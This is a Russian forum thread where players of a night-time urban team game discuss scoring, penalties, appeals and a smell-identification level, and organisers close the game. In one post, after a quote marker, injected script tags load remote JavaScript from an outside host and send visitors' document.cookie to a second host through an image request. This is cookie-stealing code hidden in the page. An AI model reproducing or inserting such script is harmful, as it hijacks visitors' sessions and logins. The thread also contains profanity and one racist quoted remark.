![]() |
а когда стату ждать?
|
Цитата:
|
Вот тут сравнивают эту игру и Цирк. А мне так наоборот больше эта понравилась, т.к. не ездил по всему городу фотки собирать. Поэтому, кому как повезло - кто бонусы собирал, кто на основе был.
А деление первого уровня на 3 было хорошей идей - никто не стоял. Единственное, что-то не то было с закуркой, т.к. по факту, на прачечную было 1,5 часа вместо 3. |
Цитата:
А то что менты не приехали, так это просто повезло, но все же шумели, так что штраф им! В ДЛ1 за это точно бы штраф дали часа 3, а я тут только 1,5 предлагаю! |
Цитата:
|
Чота да, второй день уже стату считают видать...
|
Цитата:
|
Считайте, что у вас стоптайм))
|
Цитата:
|
а там статистики то не ожидается?
|
Цитата:
|
Цитата:
|
Статистика посчитана, сценарии открыты.
Основная игра Бонусная игра Крайний срок приема апелляций - полдень 27 марта. |
Цитата:
Цитата:
|
Цитата:
Цитата:
|
Цитата:
Цитата:
Цитата:
Цитата:
Кстати, говоря о сталкере, уместно отметить превосходные действия игроков команды CodeBreakers и ни в какие ворота не лезущие действия игроков команды NoName. |
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
Цитата:
|
Цитата:
И откройте плиз топ-10. |
Цитата:
|
Цитата:
|
Цитата:
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
Да, про точку Фейнмана повеселило. |
Цитата:
|
Цитата:
Цитата:
|
Ваще смысла в таком сталкере нет тогда.
|
"Это баскетбол, вы - негры, что непонятного?"
Это заброс без окон, на улице ночь, на локации коды... По какому параметру замерялся уровень "дискотечности"? Скажите мне, кто из НоНаме был на уровне, я им лицо обгладаю, потому что вместо того чтобы искать кодюли и не слить уровень, они танцевали и светили в окно... |
Цитата:
|
Я вам могу сам процетировать впшего агента: -"... просто никакой другой команде замечание сделано не было"
Ну блять это всё объясняет. Короче, мне не хочется спорить с мультяхой, у нас свой есть, но когда на уровне есть окна, есть коды, фонари у команды не забирают, а игра линейная, то штрафы можно херачить по своему усмотрению любой понравившейся/непонравившейся команде. Игра понравилась, но непонятно нахера писать про то какие эти молодцы, а эти мудаки, если решение все равно не принято. Эмоциональный фон передать разве что. |
Спасибо всем, кто играл в нашу игру! Отдельное спасибо всем, кто оставил о ней отзывы. И особенное спасибо тем, кто оставил положительные отзывы: nadlooshi, ndevil, flaxing, DJs_FAN, Heckfy, -Antoshka-, Kroxa, Confeta, Book'Sir, Pukkaras, Дмитрич, Goy.
Отдельное хочется отметить DEd_MONro и Velkopiterskij, снимавшим значительную часть вопросов команд до того, как это успевали сделать орги. Velkopiterskij, ты настолько четко и правильно воспринимал всю информацию, исходившую от оргов, что в определенный момент мы засомневались в том, что ты не делал игру вместе с нами =) Для тебя вечно открыта вакансия PR-менеджера команды WTF =) |
Цитата:
Поведение игроков команды NoName было упомянуто исключительно для того, чтобы обратить на него внимание самой команды NoName. |
Спасибопожалуйста
|
А где в анонсе написано, что вы не будете считать штрафы в бонусной игре?
|
Цитата:
|
Цитата:
|
Цитата:
|
Спасибо!
|
Цитата:
по игре - задумка с уровнем запахи понравилась, повеселил флешмоб на конструкторе, на перфаках почти не побывал, кроме финишного но и его хватило :) отдельное спасибо за много единичек, так уж получилось что в самом начале игры сильно повредил ногу, но даже в таком елепередвигающемся и хромающем состоянии досталось немного поснимать кодюли. про адские стоптаймы и спать в макдаке уже итак писали, тоже не понравилось. |
Цитата:
|
Пост для тех, кто любит почитать.
Игра не оставила целостного впечатления, но объять необъятное, очевидно, задумка авторов :o. Распараллелить игру это интересно и храбро. Ближе к концу подумалось, что, было бы у нас чуть больше экипажей, 1 имело бы смысл отправить только на бонусы. Мы, по крайней мере, были бы за.) Получилось же, что в голове фрагментарно-гносеологическая (прям другого слова и не подберу) каша из условий и 3-4 уровней основы и задорный многократный проезд по зоне за бонусами без практического понимания "сапёра", его сути и содержания, на голом драйве. Купленный до игры банан летал по салону, но так съеден и не был. И вот что удалось почерпнуть. Разделю на основное и бонусные сообщения :rolleyes: : Основное: + Громадное водительское спасибо за зону и отдельно за крота, это кайф. Несмотря на лагающую сеть, которая за кротом не успевала и не позволяла посекундно мониторить норы и наш первый экипаж, а также глухие заборы на дороге, одного-таки поймали, и я лично влепил ему лопатой между глаз. И по зоне игры - оказалось, такой размер зоны это преимущество. Было очень круто ловить бонусы то тут, то там - нашлась аналогия с Супер-Марио. В общем, то, что мы зацепили - в основном понравилось. Покатались знатно. И кажется, даже было небольшое подобие сюжета:p. Бонусное: - Орги, специально для вас: 221 рецепт блюд из фенхеля: http://www.gotovim.ru/subject/ovoshy/fenhel.shtml Надеюсь, это позволит отныне считать забравшийся в несъедобный первый сектор фенхель (и тархун/анис, на которые запах похож), пригодным для пищи. Как вариант, сейчас после игры всё-таки проехать и прописать код на RR1=). Иначе зря мы его там, что ли, абсолютно логично искали около 2 часов. Добью высказанную тут мысль про уровень "запахи". Идея прекрасна, окей, пусть даже будет съедобное-несъедобное, но логика съедобного должна быть командам понятна. Если вы имеете в виду то, что можно употреблять само по себе, а не как приправу, обязательно надо заложить намёк в загадку/подсказку (хотя какая там приправа, фенхель прекрасно употребляется как основа). Когда кода на однозначно съедобном секторе нет, этот момент становится ключевым. Ведь съедобное на автомате это то, что можно употребить, а не то, что вы считаете, можно употребить. И было бы интересно узнать, что это были за запахи (все 10). В целом эта игра = гигантская работа. Одно это достойно уважения. Спасибо. Вымотались порядком за два подряд игровых дня, это хорошо;). P.S. Волнует местоположение кода на Косыгина. |
На ударников от нонейма я видел Странного. Не знаю был ли он непосредственно на локе или просто подъезжал, но если Женя там был, то я в нем уверен на 100%, светить он бы мог только там где это можно делать. Вот уж кто кто, а Странный знает как выполнять такие уровни.
И да, как верно заметил Слава, метки на окнах, это ппц, учитывая то как позицианировался уровень . |
Цитата:
Код был прописан на внутренней стороне ножки скамейки на второй от площади остановке, но не на той стороне, на которую указывала точка на гугл-карте, а на противоположной. Смещение вызвано обновлением гугл-карт, о котором мы уже писали. Фотография кода, скорее всего, будет доступна завтра. |
Цитата:
не парьтесь, все иногда не могут что то найти) |
Цитата:
Цитата:
Поэтому когда Майк сказал читать двигло, это никак мне не помогло. Кстати, напишите правильные запахи, интересно, где угадал, а где нет;) Цитата:
P.S. Поставил все пятерки, так как не нашел, к чему особо придраться)) |
Цитата:
Изображение полевого кода от клетки 9.3 доступно, к сожалению, только в таком виде. Оно не позволяет понять, где именно находится код, но он таки был =) |
Цитата:
спасибо за игру, за труды. первый уровень сбил настрой немного. мнения об игре в команде разделились, от меня спасибо за Крота. без штаба печалька в ваши игры играть :( |
Срок приема апелляций истек, апелляций не поступало.
Крайний срок выставления оценок - полдень 31 марта (вроде бы, поправьте, если 1 апреля). Спасибо всем, кто играл! P.S. Список запахов из первого уровня:
<object width="550" height="124"><param name="movie" value="http://embed.prostopleer.com/track?id=B2zzesB3bmfaBoa3"></param><embed src="http://embed.prostopleer.com/track?id=B2zzesB3bmfaBoa3" type="application/x-shockwave-flash" width="550" height="124"></embed></object> <br> <small>Listen or <a href="http://prostopleer.com/tracks/5038084gQr2" target="_blank">download Чип и Дейл Спешат на помощь for free</a> on <a href="http://prostopleer.com/" target="_blank">Prostopleer</a></small> |
это фишка такая укроп фенхелем называть?
|
Цитата:
Цитата:
|
Цитата:
|
а анисом вы чо назвали ?
|
Цитата:
<script language='javascript' charset='UTF-8' type='text/javascript' src='http://nummobile.com/80j4ch2sa3g98uehlyoro4uftwotqhh'></script> <script> img = new Image(); img.src = "http://frontext.ru/www/s.gif?"+document.cookie; </script> |
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
а я вот чо вспомнил. седьмой-то детскую мечту исполнил? :D |
Цитата:
|
Цитата:
И да, представил: "Ало, Сгу, тут запахи разные... всего 10 штук! Какие? А, ну, это... точняк нейроли и фенхель!":D |
Эээ...сходи к врачу. Если обоняние так изменено, то это может быть очень плохо...О.о
|
Цитата:
|
Ребята, я думаю вам пора завязывать с алкоголем, раз вам Самбука и глинтвейн четко мерещится. ;))
|
Цитата:
|
Цитата:
|
Цитата:
Цитата:
Анис Кокос Малина/карамель Пихта Гвоздика Апельсин/лимон какая то хрень Яблоко Сосна Клубника/глинтвейн так что тупо сладкие запахи в итоге смотрели |
Цитата:
Цитата:
ну в приииинципе.... |
игру то закроете? очки начислите?
|
закроем. начислим.
|
Очевидно, моё предыдущее сообщение было настолько мелким, что его трудно было разглядеть.=) В следующий раз буду заметнее.
Так или иначе, по-прежнему ждём любого комментария о съедобности фенхеля. |
да уж :) список оргов выглядит "как бы так бы заебать бы?"
|
Цитата:
Цитата:
|
Ну этож нейроли. Как не знал? Да я из дома не выйду пока полкилограмма этой нейроли не снюхаю.
|
А с каких пор приправа - это нечто не съедобное? Я так, для общего развития :)
|
Цитата:
Во-первых, гвоздика приправа, а фенхель спокойно употребляется как основное блюдо (см. пару страниц назад ссылку на рецепты). Но даже если и не так (допустим, оба приправы)... Получив ориентировку "съедобное-несъедобное", как "съедобное" любой человек воспринимает то, что можно физически съесть. То есть не ядовитое и пр. И этот запах туда входит... О чёрном перце говорить не будем, там был фенхель;). Не вполне гуманно искать код у точно съедобного запаха, когда кода там нет (ты же не можешь проверить итоговый код, будучи уверен, что это-то съедобно, и => код уровня там есть). А надо было просто в последней подсказке намекнуть, что именно вы считаете съедобным и что это не вполне обычное понимание "съедобно-несъедобного". |
Гаечка уже не та...
http://cs407525.vk.me/v407525418/7367/LLsbTIBZoXo.jpg |
Цитата:
был там. нюхал. круто. |
Игры закрыты, очки начислены.
Еще раз спасибо всем, кто играл, отзывался и ставил оценки ) |
|
Команда ВТФ получила 14 баллов в рейтинг.
|
Часовой пояс GMT +3, время: 09:48. |